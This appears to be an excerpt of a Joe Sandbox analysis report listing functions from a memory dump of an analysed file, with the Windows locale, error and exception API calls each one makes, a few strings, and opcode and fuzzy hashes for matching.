Function 01011583 Relevance: 10.2, APIs: 1, Strings: 4, Instructions: 1436COMMON

Download Yara Rule

APIs

__floor_pentium4.LIBCMT ref: 01011767

Strings

1#INF, xrefs: 010116B9
1#SNAN, xrefs: 0101168F
1#QNAN, xrefs: 01011696
1#IND, xrefs: 01011688

Memory Dump Source

Source File: 00000000.00000002.2070827520.0000000000FF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true

Associated: 00000000.00000002.2070810614.0000000000FF0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070852613.0000000001017000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070870185.0000000001023000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070870185.0000000001056000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070924631.000000000105A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ff0000_file.jbxd

Yara matches

Similarity

API ID: __floor_pentium4
String ID: 1#IND$1#INF$1#QNAN$1#SNAN
API String ID: 4168288129-2761157908
Opcode ID: fafe874b0234ca5375a478118fb1965e6dd96c433c61447cd03320646e670ab8
Instruction ID: 523be830619d2dab064662d06350da9fcefe01a01bb8e51034acbc26d9cb92ca
Opcode Fuzzy Hash: fafe874b0234ca5375a478118fb1965e6dd96c433c61447cd03320646e670ab8
Instruction Fuzzy Hash: 93D22871E082298FDB69CE28DD407EAB7F5EB48344F1441EAD58DE7244E778AE818F41

Function 010108C4 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 85COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(00000000,2000000B,01010BE2,00000002,00000000,?,?,?,01010BE2,?,00000000), ref: 0101095D
GetLocaleInfoW.KERNEL32(00000000,20001004,01010BE2,00000002,00000000,?,?,?,01010BE2,?,00000000), ref: 01010986
GetACP.KERNEL32(?,?,01010BE2,?,00000000), ref: 0101099B

Strings

ACP, xrefs: 010108E2
OCP, xrefs: 01010918

Memory Dump Source

Source File: 00000000.00000002.2070827520.0000000000FF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true

Associated: 00000000.00000002.2070810614.0000000000FF0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070852613.0000000001017000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070870185.0000000001023000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070870185.0000000001056000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070924631.000000000105A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ff0000_file.jbxd

Yara matches

Similarity

API ID: InfoLocale
String ID: ACP$OCP
API String ID: 2299586839-711371036
Opcode ID: b8e278cdf34670ddccb67c277bdece2535bb9c2e2a60eb5e0b6767bc43db8275
Instruction ID: e229c69b0d22e48000027096c85ff420efcd743b9bca7d38b013c82b9fd482bc
Opcode Fuzzy Hash: b8e278cdf34670ddccb67c277bdece2535bb9c2e2a60eb5e0b6767bc43db8275
Instruction Fuzzy Hash: 6D21FB72700104AAFB758F5DC920AAB77E7BF40A60B5680A4F9C9D710DEB3ADAC1C750

Function 01010A99 Relevance: 7.7, APIs: 5, Instructions: 183COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 01006C90: GetLastError.KERNEL32(?,00000008,0100728F,?,?,00FF3AA8,01058E0C,?,?,00FF2949,?,?,?,?,?,00FF143A), ref: 01006C94
Part of subcall function 01006C90: SetLastError.KERNEL32(00000000), ref: 01006D36

GetUserDefaultLCID.KERNEL32(?,?,?,00000055,?), ref: 01010BA5
IsValidCodePage.KERNEL32(00000000), ref: 01010BEE
IsValidLocale.KERNEL32(?,00000001), ref: 01010BFD
GetLocaleInfoW.KERNEL32(?,00001001,-00000050,00000040,?,000000D0,00000055,00000000,?,?,00000055,00000000), ref: 01010C45
GetLocaleInfoW.KERNEL32(?,00001002,00000030,00000040), ref: 01010C64

Memory Dump Source

Source File: 00000000.00000002.2070827520.0000000000FF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true

Associated: 00000000.00000002.2070810614.0000000000FF0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070852613.0000000001017000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070870185.0000000001023000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070870185.0000000001056000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070924631.000000000105A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ff0000_file.jbxd

Yara matches

Similarity

API ID: Locale$ErrorInfoLastValid$CodeDefaultPageUser
String ID:
API String ID: 415426439-0
Opcode ID: 74e5a57bc200e92f6f476c46093c8209803cca7561ae0fdcb14f35426e89a903
Instruction ID: c883d19a7d51fa3221a54ae501849da725b914f6e105fe022a759c7d51025e1a
Opcode Fuzzy Hash: 74e5a57bc200e92f6f476c46093c8209803cca7561ae0fdcb14f35426e89a903
Instruction Fuzzy Hash: D8515471A0020A9FEB51DFA9DC84ABE77F8BF54704F0444A9BAD0DB19CD7789580CB61

Function 01010135 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 251COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 01006C90: GetLastError.KERNEL32(?,00000008,0100728F,?,?,00FF3AA8,01058E0C,?,?,00FF2949,?,?,?,?,?,00FF143A), ref: 01006C94
Part of subcall function 01006C90: SetLastError.KERNEL32(00000000), ref: 01006D36

GetACP.KERNEL32(?,?,?,?,?,?,010052E9,?,?,?,00000055,?,-00000050,?,?,00000004), ref: 010101F6
IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,010052E9,?,?,?,00000055,?,-00000050,?,?), ref: 01010221
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,-00000050,00000000,000000D0), ref: 01010384

Strings

utf8, xrefs: 010102F3

Memory Dump Source

Source File: 00000000.00000002.2070827520.0000000000FF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true

Associated: 00000000.00000002.2070810614.0000000000FF0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070852613.0000000001017000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070870185.0000000001023000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070870185.0000000001056000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070924631.000000000105A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ff0000_file.jbxd

Yara matches

Similarity

API ID: ErrorLast$CodeInfoLocalePageValid
String ID: utf8
API String ID: 607553120-905460609
Opcode ID: f229e2d9c725114161c483d12c9b9e8a472a9b1753c283c30c0affd0bf48cb5d
Instruction ID: b64940e77829b26cf8d1c9b0f41f9fdfb404287f4c4ac4cd739eced7a6faf243
Opcode Fuzzy Hash: f229e2d9c725114161c483d12c9b9e8a472a9b1753c283c30c0affd0bf48cb5d
Instruction Fuzzy Hash: 3771D571600206ABE725AB78CC45AAB77ECEF59700F148069F6C59718CEB7CE9818760

Function 010080C2 Relevance: 6.3, APIs: 4, Instructions: 337COMMON

Download Yara Rule

APIs

_strrchr.LIBCMT ref: 0100814F

Memory Dump Source

Source File: 00000000.00000002.2070827520.0000000000FF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true

Associated: 00000000.00000002.2070810614.0000000000FF0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070852613.0000000001017000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070870185.0000000001023000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070870185.0000000001056000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070924631.000000000105A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ff0000_file.jbxd

Yara matches

Similarity

API ID: _strrchr
String ID:
API String ID: 3213747228-0
Opcode ID: 7d3d0efe66d1695338b9613b9120aba3f50c32649be67e04b973d1ace9b72ed7
Instruction ID: 86af75df216bc87549ef01ea944c2691a66cbf0b9aed5450568bb719d905aa5a
Opcode Fuzzy Hash: 7d3d0efe66d1695338b9613b9120aba3f50c32649be67e04b973d1ace9b72ed7
Instruction Fuzzy Hash: 3FB12872D046459FEB178F68C881BEEBBE5FF95310F15C1ABE985AB2C1D2349901C7A0

Function 00FFA52A Relevance: 6.1, APIs: 4, Instructions: 70COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(00000017,?), ref: 00FFA536
IsDebuggerPresent.KERNEL32 ref: 00FFA602
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00FFA61B
UnhandledExceptionFilter.KERNEL32(?), ref: 00FFA625

Memory Dump Source

Source File: 00000000.00000002.2070827520.0000000000FF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true

Associated: 00000000.00000002.2070810614.0000000000FF0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070852613.0000000001017000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070870185.0000000001023000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070870185.0000000001056000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070924631.000000000105A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ff0000_file.jbxd

Yara matches

Similarity

API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
String ID:
API String ID: 254469556-0
Opcode ID: 6e6115604d48eba7eae9617c9a3654958dbd1e97451c737f6dfa2b099b197641
Instruction ID: e1aaf8b042dba0492a6534f2dfc610e5fca3b5b69f8affe4b6bb471b9d9b1b16
Opcode Fuzzy Hash: 6e6115604d48eba7eae9617c9a3654958dbd1e97451c737f6dfa2b099b197641
Instruction Fuzzy Hash: 3031D6B5D0531CDBDB21DFA4D9897CDBBB8AF08300F1041EAE50CAB250EB759A859F45

Function 01010548 Relevance: 4.7, APIs: 3, Instructions: 205COMMON

Download Yara Rule

APIs

Part of subcall function 01006C90: GetLastError.KERNEL32(?,00000008,0100728F,?,?,00FF3AA8,01058E0C,?,?,00FF2949,?,?,?,?,?,00FF143A), ref: 01006C94
Part of subcall function 01006C90: SetLastError.KERNEL32(00000000), ref: 01006D36

GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0101059C
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 010105E6
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 010106AC

Memory Dump Source

Source File: 00000000.00000002.2070827520.0000000000FF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true

Associated: 00000000.00000002.2070810614.0000000000FF0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070852613.0000000001017000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070870185.0000000001023000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070870185.0000000001056000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070924631.000000000105A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ff0000_file.jbxd

Yara matches

Similarity

API ID: InfoLocale$ErrorLast
String ID:
API String ID: 661929714-0
Opcode ID: f76b692a7c299be0072093f945f82469ebc80c42bbeca8c1f8ad05a104ffd6de
Instruction ID: f0a697e52cbf89bbaf76aec1c2b35198e847d6b9254334ebf264eb0dfecfc488
Opcode Fuzzy Hash: f76b692a7c299be0072093f945f82469ebc80c42bbeca8c1f8ad05a104ffd6de
Instruction Fuzzy Hash: 71616B719002079FEB699F28CC85BAA77A9FF48344F1045AAF9C5C618DEB38D981CB50

Function 00FFE423 Relevance: 4.6, APIs: 3, Instructions: 77COMMONLIBRARYCODE

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32(?,?,?,?,?,?), ref: 00FFE51B
SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,?), ref: 00FFE525
UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,?), ref: 00FFE532

Memory Dump Source

Source File: 00000000.00000002.2070827520.0000000000FF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true

Associated: 00000000.00000002.2070810614.0000000000FF0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070852613.0000000001017000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070870185.0000000001023000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070870185.0000000001056000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070924631.000000000105A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ff0000_file.jbxd

Yara matches

Similarity

API ID: ExceptionFilterUnhandled$DebuggerPresent
String ID:
API String ID: 3906539128-0
Opcode ID: ec9701b24ce0e6af71f0df8e969c893f2b2015247d5278916d5e0b26a14f31c4
Instruction ID: 7ad0f83bd3eb895676d0782b53cb928ab25adc6635d1eedbbe4684f4f13a361a
Opcode Fuzzy Hash: ec9701b24ce0e6af71f0df8e969c893f2b2015247d5278916d5e0b26a14f31c4
Instruction Fuzzy Hash: 8631C47490131C9BCB21DF28DC8979DBBB8BF08310F5441EAE51CA7260EB749B859F55

Function 01003530 Relevance: 3.4, APIs: 2, Instructions: 449COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2070827520.0000000000FF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true

Associated: 00000000.00000002.2070810614.0000000000FF0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070852613.0000000001017000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070870185.0000000001023000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070870185.0000000001056000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070924631.000000000105A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ff0000_file.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a197006b6fd7bb220d93cfbcff459c0e91ca35aa8dfddad1704987d1759fe6e5
Instruction ID: d128f7185a1f65b43d2a9ac7a0b0d34ed69f6026a47eeb390b7e4725b683cf08
Opcode Fuzzy Hash: a197006b6fd7bb220d93cfbcff459c0e91ca35aa8dfddad1704987d1759fe6e5
Instruction Fuzzy Hash: 5DF13171E002199FEF16CF69C8806ADFBF1FF88314F1582A9D959AB391D7309A45CB90

Function 0100C81A Relevance: 1.8, APIs: 1, Instructions: 274COMMONLIBRARYCODE

Download Yara Rule

APIs

RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,0100C815,?,?,00000008,?,?,010158E5,00000000), ref: 0100CA47

Memory Dump Source

Source File: 00000000.00000002.2070827520.0000000000FF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true

Associated: 00000000.00000002.2070810614.0000000000FF0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070852613.0000000001017000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070870185.0000000001023000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070870185.0000000001056000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070924631.000000000105A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ff0000_file.jbxd

Yara matches

Similarity

API ID: ExceptionRaise
String ID:
API String ID: 3997070919-0
Opcode ID: f4c3a62774cac40da6089b6892651282ff75919c1f7703a6dce6f95d32c1a282
Instruction ID: 42ad56c4df8d8a88354f69e752862015d4994008db1d100c6ae69b5252a68cb2
Opcode Fuzzy Hash: f4c3a62774cac40da6089b6892651282ff75919c1f7703a6dce6f95d32c1a282
Instruction Fuzzy Hash: 9EB106316106099FF756CF2CC58AA657BE0FB45364F298698E9D9CF2E1C335E981CB40

Function 00FFA215 Relevance: 1.6, APIs: 1, Instructions: 147COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 00FFA22B

Memory Dump Source

Source File: 00000000.00000002.2070827520.0000000000FF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true

Associated: 00000000.00000002.2070810614.0000000000FF0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070852613.0000000001017000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070870185.0000000001023000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070870185.0000000001056000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070924631.000000000105A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ff0000_file.jbxd

Yara matches

Similarity

API ID: FeaturePresentProcessor
String ID:
API String ID: 2325560087-0
Opcode ID: 506a1d181983b39aad0b64e942220dda582fbf18ea98f13d590eff590ecfb6ea
Instruction ID: efbb8474e459ba8c3b14ce6d4972ac1e15d45aed49a17b952543cdf932fcc71d
Opcode Fuzzy Hash: 506a1d181983b39aad0b64e942220dda582fbf18ea98f13d590eff590ecfb6ea
Instruction Fuzzy Hash: 415198B1E10308CBEB24CF98D4D17AABBF4FB44354F20806AD548EB295D37AA944DF50

Function 0100D5B1 Relevance: 1.6, APIs: 1, Instructions: 140COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2070827520.0000000000FF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true

Associated: 00000000.00000002.2070810614.0000000000FF0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070852613.0000000001017000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070870185.0000000001023000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070870185.0000000001056000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070924631.000000000105A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ff0000_file.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c5022b20cea589381e22188a9389d0a03d27a9b2d0c333b0b2f6796a2916c871
Instruction ID: 84d0bb9572c3de73ce6f96858a0cced2f8caa7573b8b80cf3fcc70382da69ea2
Opcode Fuzzy Hash: c5022b20cea589381e22188a9389d0a03d27a9b2d0c333b0b2f6796a2916c871
Instruction Fuzzy Hash: 8F41A87580421DAEDB61DFADCC88AEABBB9EF45304F1441D9E44DD3241DB359E458F20

Function 0101079B Relevance: 1.6, APIs: 1, Instructions: 83COMMON

Download Yara Rule

APIs

Part of subcall function 01006C90: GetLastError.KERNEL32(?,00000008,0100728F,?,?,00FF3AA8,01058E0C,?,?,00FF2949,?,?,?,?,?,00FF143A), ref: 01006C94
Part of subcall function 01006C90: SetLastError.KERNEL32(00000000), ref: 01006D36

GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 010107EF

Memory Dump Source

Source File: 00000000.00000002.2070827520.0000000000FF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true

Associated: 00000000.00000002.2070810614.0000000000FF0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070852613.0000000001017000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070870185.0000000001023000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070870185.0000000001056000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070924631.000000000105A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ff0000_file.jbxd

Yara matches

Similarity

API ID: ErrorLast$InfoLocale
String ID:
API String ID: 3736152602-0
Opcode ID: 71b29f413a5e7c3dc3934a9da67beebef4a2dbb5312b539a10209c93b32e5fd3
Instruction ID: 06d4a8a4a2f15ae056fd69c773b40838480961cb0c3d4ea712fbbffd9d205b12
Opcode Fuzzy Hash: 71b29f413a5e7c3dc3934a9da67beebef4a2dbb5312b539a10209c93b32e5fd3
Instruction Fuzzy Hash: 982198316052069BEB299E19DC45ABA77E8EF44314F10407DFDC5D6149EB39E981CB90

Function 01000454 Relevance: 1.6, Strings: 1, Instructions: 314COMMON

Download Yara Rule

Strings

0, xrefs: 010005DE

Memory Dump Source

Source File: 00000000.00000002.2070827520.0000000000FF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true

Associated: 00000000.00000002.2070810614.0000000000FF0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070852613.0000000001017000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070870185.0000000001023000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070870185.0000000001056000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070924631.000000000105A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ff0000_file.jbxd

Yara matches

Similarity

API ID:
String ID: 0
API String ID: 0-4108050209
Opcode ID: 2278bd0b50c19c6cc5eb16c3a136f11e2de46caf9b42d28d27dcb3d6260a3864
Instruction ID: 648965375e5fecfa19cff51c44d9cacaea5cb7434a68a7efd4534878a08d1648
Opcode Fuzzy Hash: 2278bd0b50c19c6cc5eb16c3a136f11e2de46caf9b42d28d27dcb3d6260a3864
Instruction Fuzzy Hash: BFB114B090060A8BFB668F6CC890BBFBBE1AF45380F14065AF5D6972D9CB35D541CB46

Function 01010422 Relevance: 1.6, APIs: 1, Instructions: 63COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 01006C90: GetLastError.KERNEL32(?,00000008,0100728F,?,?,00FF3AA8,01058E0C,?,?,00FF2949,?,?,?,?,?,00FF143A), ref: 01006C94
Part of subcall function 01006C90: SetLastError.KERNEL32(00000000), ref: 01006D36

EnumSystemLocalesW.KERNEL32(01010548,00000001,00000000,?,-00000050,?,01010B79,00000000,?,?,?,00000055,?), ref: 01010494

Memory Dump Source

Source File: 00000000.00000002.2070827520.0000000000FF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true

Associated: 00000000.00000002.2070810614.0000000000FF0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070852613.0000000001017000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070870185.0000000001023000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070870185.0000000001056000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070924631.000000000105A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ff0000_file.jbxd

Yara matches

Similarity

API ID: ErrorLast$EnumLocalesSystem
String ID:
API String ID: 2417226690-0
Opcode ID: f65607a61347ef0bbb93752df11cda6b0772cba4f1e7a8dc6226f3f3384b4b40
Instruction ID: 4fc3ab3ff17f15c133dad34ac04f4761019540a8428bd4841d92483bf3062f20
Opcode Fuzzy Hash: f65607a61347ef0bbb93752df11cda6b0772cba4f1e7a8dc6226f3f3384b4b40
Instruction Fuzzy Hash: 601129762003055FEB189F39C8915BAB792FF80328B54442CE9C687644D77AB582CB40

Function 010109CA Relevance: 1.5, APIs: 1, Instructions: 45COMMON

Download Yara Rule

APIs

Part of subcall function 01006C90: GetLastError.KERNEL32(?,00000008,0100728F,?,?,00FF3AA8,01058E0C,?,?,00FF2949,?,?,?,?,?,00FF143A), ref: 01006C94
Part of subcall function 01006C90: SetLastError.KERNEL32(00000000), ref: 01006D36

GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,01010764,00000000,00000000,?), ref: 010109F6

Memory Dump Source

Source File: 00000000.00000002.2070827520.0000000000FF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true

Associated: 00000000.00000002.2070810614.0000000000FF0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070852613.0000000001017000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070870185.0000000001023000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070870185.0000000001056000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070924631.000000000105A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ff0000_file.jbxd

Yara matches

Similarity

API ID: ErrorLast$InfoLocale
String ID:
API String ID: 3736152602-0
Opcode ID: df054cb99aa8795f370973ca57b9645dfeedd62415418af789cb0e1d3435e4b1
Instruction ID: 3657d6c417c2e00ee8891fffecdd832ef61906208c418666642a8a44ea45b7ce
Opcode Fuzzy Hash: df054cb99aa8795f370973ca57b9645dfeedd62415418af789cb0e1d3435e4b1
Instruction Fuzzy Hash: F7F0F937A001166BEB285A288C05BFB7B94EB40754F450568FDC1A318CEA78F981CAD0

Function 010104BD Relevance: 1.5, APIs: 1, Instructions: 41COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 01006C90: GetLastError.KERNEL32(?,00000008,0100728F,?,?,00FF3AA8,01058E0C,?,?,00FF2949,?,?,?,?,?,00FF143A), ref: 01006C94
Part of subcall function 01006C90: SetLastError.KERNEL32(00000000), ref: 01006D36

EnumSystemLocalesW.KERNEL32(0101079B,00000001,00000000,?,-00000050,?,01010B3D,-00000050,?,?,?,00000055,?,-00000050,?,?), ref: 01010507

Memory Dump Source

Source File: 00000000.00000002.2070827520.0000000000FF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true

Associated: 00000000.00000002.2070810614.0000000000FF0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070852613.0000000001017000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070870185.0000000001023000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070870185.0000000001056000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070924631.000000000105A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ff0000_file.jbxd

Yara matches

Similarity

API ID: ErrorLast$EnumLocalesSystem
String ID:
API String ID: 2417226690-0
Opcode ID: 241e1827fdb905b4c143dde961605c14f7accceae07e743721f1e49b092ea9b0
Instruction ID: 7bb72b6d60336c9095ed77aeb9922d6dd0d489fad80e0d5d555e19b2e27fd3ea
Opcode Fuzzy Hash: 241e1827fdb905b4c143dde961605c14f7accceae07e743721f1e49b092ea9b0
Instruction Fuzzy Hash: 99F0F6763003095FDB255F7D9885A7B7BD1FF80368F05846CFAC54B688D67AA882CB50

Function 01007515 Relevance: 1.5, APIs: 1, Instructions: 33COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 01000ECC: EnterCriticalSection.KERNEL32(?,?,01006FCF,?,01021B68,0000000C), ref: 01000EDB

EnumSystemLocalesW.KERNEL32(01007508,00000001,01021B88,0000000C,01007937,00000000), ref: 0100754D

Memory Dump Source

Source File: 00000000.00000002.2070827520.0000000000FF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true

Associated: 00000000.00000002.2070810614.0000000000FF0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070852613.0000000001017000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070870185.0000000001023000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070870185.0000000001056000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070924631.000000000105A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ff0000_file.jbxd

Yara matches

Similarity

API ID: CriticalEnterEnumLocalesSectionSystem
String ID:
API String ID: 1272433827-0
Opcode ID: 63c3266176ac1ced9c5c5639277c45ca57b16f72255553d07c088c67b94eb500
Instruction ID: 37731fcf2f8fca79c4ac56721327fae0f717687691e5d3fe70da632be76996e8
Opcode Fuzzy Hash: 63c3266176ac1ced9c5c5639277c45ca57b16f72255553d07c088c67b94eb500
